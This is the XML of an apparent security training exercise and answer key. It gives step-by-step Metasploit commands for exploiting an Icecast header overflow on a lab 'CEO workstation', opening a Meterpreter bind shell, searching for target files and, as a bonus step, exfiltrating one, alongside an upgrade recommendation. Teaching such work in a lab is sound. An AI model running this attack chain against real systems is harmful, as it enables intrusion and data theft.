          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FC0FBC1" wp14:editId="3EF17982">
            <wp:extent cx="5943600" cy="137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09FE" w14:textId="1E4DC8BB" w:rsidR="00886C25" w:rsidRDefault="00886C25">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DE28B8" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCCFD9A" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C29BFDC" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B21644" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230D0326" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453E977B" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4618E3" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55356FB7" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0BA29B" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E6DC58" w14:textId="10C98A50" w:rsidR="001A266E" w:rsidRDefault="001A266E" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server HTTP Header Buffer Overflow was only vulnerable in versions 2.0 and 2.0.1. We recommend upgrading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to version 2.0.2 which is not vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECBC73A" w14:textId="0AA6BD56" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BA47BC" w14:textId="3A5ED9AE" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D1AEA4" w14:textId="7E25BFE3" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093F6067" w14:textId="5F62097C" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F12D17B" w14:textId="1FFB4A0E" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0654C3EC" w14:textId="7CECD720" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2505CEC7" w14:textId="6ADA6E59" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C8462A" w14:textId="1638A096" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E5FE9A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1121196F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580895F9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0F2BAA32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700C83E6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7793DD23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1745E889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618E3D1B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130EB02F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7F41DA26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646E838B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26A84EC4" w14:textId="77777777" w:rsidR="00E72030" w:rsidRDefault="00E72030" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786AE386" w14:textId="7EB952BE" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>You've</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> been provided full access to the network and are getting ping responses from the CEO’s workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A78A4F" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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lastRenderedPageBreak/>
        <w:t>Perform a service and version scan using Nmap to determine which services are up and running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76844B5B" w14:textId="18818B5C" w:rsidR="00416F1A" w:rsidRPr="004E113C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080"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E113C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Run the Nmap command that performs a service and version scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C077B68" w14:textId="14575F0E" w:rsidR="004E113C" w:rsidRDefault="00416F1A" w:rsidP="004E113C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2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E113C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E113C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E113C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E113C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E66058" w14:textId="77777777" w:rsidR="004E113C" w:rsidRPr="004E113C" w:rsidRDefault="004E113C" w:rsidP="004E113C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2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AF7ECF" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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From the previous step, we see that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> service is running. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Let's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> start by attacking that service. Search for any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A07DC6" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SearchSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands to show available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13060613" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="004E5C22" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer: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Header overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923D07B" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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Now that we know which exploits are available to us, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>let's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> start Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01E6C3" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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>Run the command that starts Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE85C8" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="00F27A34" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer: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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="445F1350" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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Search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> module and load it for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74ACBF" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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Run the command to search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13D635" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="0016379A" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer: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 xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D0D7948" w14:textId="77777777" w:rsidR="00416F1A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Run the command to use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2AAAE" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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use exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icecast_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="508AA1DD" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of copying the entire path to the module, you can use the number in front of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71706E27" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="00E42DB7" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer: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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013ECA54" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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Set the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4AB3E" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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Run the command that sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F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set RHOST 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A423D" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C05DD" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19B1BF" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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Run the command that runs the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C4CAA6" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer: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set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="089F0944" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="00311E5E" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="21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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583329B4" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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Run the command that performs a search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secretfile.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3BA7A" w14:textId="287316C0" w:rsidR="00416F1A" w:rsidRPr="00066FC0" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B26B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>search -f *secretfile*.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5BD39" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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>You should now have a Meterpreter session open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37592AEB" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Run the command to performs a search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recipe.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D052E8" w14:textId="40294FFE" w:rsidR="00416F1A" w:rsidRPr="00606BCB" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA4D3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>search -f *recipe*.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0990CF" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bonus</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: Run the command that exfiltrates the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recipe*.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330518DC" w14:textId="642A4F88" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidR="00BA4D3D" w:rsidRPr="00BA4D3D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA4D3D" w:rsidRPr="00BA4D3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C18FEAE" wp14:editId="73E27341">
